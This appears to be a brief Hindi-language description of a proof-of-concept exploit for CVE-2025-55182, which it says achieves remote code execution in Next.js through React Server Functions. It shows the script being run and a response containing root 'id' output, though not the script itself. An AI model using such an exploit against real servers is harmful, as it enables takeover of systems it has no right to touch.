
CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो React Server Functions के माध्यम से Next.js में रिमोट कोड एक्ज़ीक्यूशन सक्षम करता है। इसमें एक Python स्क्रिप्ट शामिल है जो कमांड इंजेक्शन प्रदर्शित करती है और सिस्टम-स्तरीय आउटपुट लौटाती है।
React Server Functions के माध्यम से Next.js RCE
❯ python3 cve-2025-55182-exploit.py
0:{"a":"$@1","f":"","b":"3OmR5Ifk9dmFJ1coB7-Wc"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}